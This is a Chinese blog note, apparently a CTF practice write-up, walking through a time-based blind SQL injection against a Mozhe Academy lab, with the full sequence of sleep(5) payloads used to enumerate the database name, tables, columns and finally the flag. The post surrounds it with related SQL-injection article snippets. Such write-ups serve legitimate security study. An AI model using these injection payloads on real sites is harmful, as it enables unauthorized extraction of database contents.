刷题笔记:SQL注入漏洞测试(时间盲注)

最新推荐文章于 2024-05-02 17:48:59 发布
最新推荐文章于 2024-05-02 17:48:59 发布
阅读量402 收藏 1
点赞数
分类专栏: web安全刷题 文章标签: 安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67399862/article/details/124891304
版权

 

无法利用页面来判断SQL注入是否能正确注入,所以考虑用时间盲注

因为一打开页面,会发现提示使用?type,所以可以用此语句来测试一下是否能进行时间盲注 

发现可以进行时间盲注

用?type=1 and if(length(database())=$0$,sleep(5),null) --+语句可以得知数据库的长度

 

可得知数据库长度为12

 

运用?type=1 and if((substr(database(),$1$,1)='$a$'),sleep(5),null) --+可得数据库的名字 

即数据库名为pentesterlab

用?type=1 and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),$1$,1)='$a$',sleep(5),null) --+语句可得第一个表名为comment

 

用同样的方法得到第二份表为flag

第三份表为goods

 

第四份表为user 

查第五份表时发现没有5秒的延时,所以总共只有4份表 

由名字推测第二份表比较像我们所需要的表,先查第二份表

用?type=1 and if(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),$1$,1)='$a$',sleep(5),null) --+

 第一份列名为id

第二份列名为flag

 

因为没有延时,所以只有两个列名

用?type=1 and if(substr((select flag from flag limit 0,1),$1$,1)='$a$',sleep(5),null) --+语句查询具体数据

可得flag为mozhe1

返回也会输入验证便可得flag 

m0_67399862
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现awvs——sql注入漏洞时间
记录并分享学习安全的知识点..
01-14 1593
一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入注入方式分 • 报错注入 • 布尔时间 • union 注入 编码问 • 宽字节注入 二、awvs扫描结果 三、漏洞复现——bp联合xray,手测加sqlmap爆破 xray开
渗透测试sql注入
weixin_46420165的博客
12-08 2169
SQL 注入SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
WEB漏洞SQL注入SQL注入漏洞
qq_61861243的博客
04-18 1243
攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
SQL注入漏洞--报错/union/布尔/时间
最新发布
嘿嘿嘿
05-02 1344
之前介绍了数据库的基本操作,今天这篇文章就来实操SQL注入。阅读本文前可以先看一下基本操作,有助于更换理解。。。
渗透测试——sql注入进阶/基于时间/一看就会/
ChenD的学习笔记
10-06 1757
基于时间
渗透测试-SQL注入之布尔时间
lza20001103的博客
04-20 2800
渗透测试-SQL注入之布尔时间
Python 笔记:位运算专
12-20
学 Python 初接触 &、| 等运算符时,只大概了解它们被称为位运算符,并不同于逻辑运算符 and、or,今天就通过基础知识点和几道目来熟悉下。 知识点 我们都知道所有数值在计算机底层是以二进制形式存在的,首先要...
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让...
java笔试算法-coding-note:笔记:LeetCode和剑指Offer等
06-03
java笔试算法 ...笔记:Leetcode和剑指Offer等 语言: C++(为主) Python ​ 项目 LintCode 参考资料 : 含剑指Offer解、Leetcode解、算法等内容 : 含算法与数据结构、C++/ JAVA /Python面试经验等
sherpahu#AlgorithmsNotes#笔记:C++基础知识——STL之pair&tuple1
07-25
PAT基础知识——STL之pair&tuple定义用法初始化:使用大括号直接对first,second赋值查询用途替换二元结构体,初始化、获取元素值更方便用于m
leetcode下载-JobFinder:华中科技大学计算机科学与技术学院笔记:hundred_points:以及工作资料:floppy_disk:
06-29
笔记:hundred_points: 以及 工作资料:floppy_disk: 大三下学期第一次参加春招,积累经验为主,拿到offer为辅. 不断学习与提高自己才是最重要滴 因为对于前端、后端技术都是但当涉猎,所以不打算直接投递纯开发岗 做...
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
墨者学院-SQL注入漏洞测试(布尔
weixin_42939822的博客
03-20 4290
决心按部就班、由浅入深地去剖析下sql注入目提供的靶场环境,完善自身解思路。本靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入目。废话不多说啦,先附上目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
《WEB安全渗透测试》(4)SQL注入实战:时间
午夜安全
10-02 8157
《WEB安全渗透测试》(4)SQL注入实战:时间 时间:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。1)考虑使用时间访问URL:http://www.tianchi.com/web/time.php?id=1返回yes......
SQL手工注入漏洞测试(MySQL数据库)
chinacqzgp的博客
09-18 1746
墨者学院靶场,sql注入,MySQL数据库
SQL注入漏洞测试(布尔)初级篇
waxcj的博客
03-25 3796
作为一个信安小白,最近在自学SQL注入,下图是该靶场环境(靶场是墨者学院的一个初级靶场) 进入这个sql靶场先观察网站的url发现并没有什么有用的信息,随后就观察网站的其他信息,发现网站除了登录界面下面还有一串滚动的消息“关于平台停机维护的通知”随后我便点了进去,终于找到了有价值的信息 仔细观察一下网站url发现了许多可用的信息,随后我就迫不及待的打开了下载好的sqlmap。Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支.
挖洞经验 | 构造基于时间漏洞(Time-Based SQLi)
南迪叶先森
07-05 505
公粽号:黒掌 一个专于分享网络安全、黑客圈热点、黑客工具技术区博主! ** ** 某天,当我参与某个漏洞众测项目中,偶尔发现之前一个从未见过的子域名网站,因此我决定深入测试一下。该网站主界面 是一个登录页面,开放了用户册功能,所以我就册了一个账户,最后试出了一个时间来。 在查看该网站过程中,我发现其中还有一个搜索功能,我尝试进行了XSS,但是无效。当时,我根本没想着去测试SQL注入漏洞,因 为我觉得开发人员应该部署了完善的过滤措施,不可能存在注入漏洞。但是,其中的点击按钮引起了我的意,即当.
SQL注入()
a12332251的博客
12-07 917
SQL
SQL注入漏洞
gududeajun的博客
12-12 6623
我的ctfwp笔记
03-25
笔记记录了作者在CTF(Capture The Flag)比赛中的经验,特别关于一道名为"whitegive_pwn"的挑战。该目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值